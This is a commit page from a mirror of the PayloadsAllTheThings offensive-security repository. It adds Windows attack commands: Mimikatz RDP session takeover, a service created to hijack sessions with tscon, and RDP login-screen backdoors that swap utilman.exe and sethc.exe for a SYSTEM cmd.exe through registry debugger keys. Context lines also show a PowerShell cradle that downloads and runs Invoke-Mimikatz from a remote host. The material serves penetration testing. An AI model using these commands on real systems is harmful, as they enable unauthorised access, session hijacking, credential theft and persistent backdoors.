ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

RDP backdoor + RDP session takeover

Browse Source
This commit is contained in:
Swissky 2019-11-26 23:39:14 +01:00
parent 06864b0ff8
commit c60f264664
3 changed files with 43 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
Methodology and Resources/Active Directory Attack.md
View File

@ -124,6 +124,12 @@
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');" powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
``` ```
* [ADRecon](https://github.com/sense-of-security/ADRecon)
```powershell
.\ADRecon.ps1 -DomainController MYAD.net -Credential MYAD\myuser
```
* [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script) * [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script)
```powershell ```powershell

17
Methodology and Resources/Windows - Mimikatz.md
View File

@ -70,6 +70,23 @@ net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
``` ```
## Mimikatz RDP session takeover
Run tscon.exe as the SYSTEM user, you can connect to any session without a password.
```powershell
privilege::debug
token::elevate
ts::remote /id:2
```
```powershell
# get the Session ID you want to hijack
query user
create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
net start sesshijack
```
## Mimikatz commands ## Mimikatz commands
| Command |Definition| | Command |Definition|

20
Methodology and Resources/Windows - Persistence.md
View File

@ -11,6 +11,7 @@
* [HKLM](#hklm) * [HKLM](#hklm)
* [Services](#services) * [Services](#services)
* [Scheduled Task](#scheduled-task) * [Scheduled Task](#scheduled-task)
* [RDP Backdoor](#rdp-backdoor)
* [References](#references) * [References](#references)
@ -114,6 +115,25 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D PS C:\> Register-ScheduledTask Backdoor -InputObject $D
``` ```
### RDP Backdoor
#### utilman.exe
At the login screen, press Windows Key+U, and you get a cmd.exe window as SYSTEM.
```powershell
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f
```
#### sethc.exe
Hit F5 a bunch of times when you are at the RDP login screen.
```powershell
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f
```
## References ## References
* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/) * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)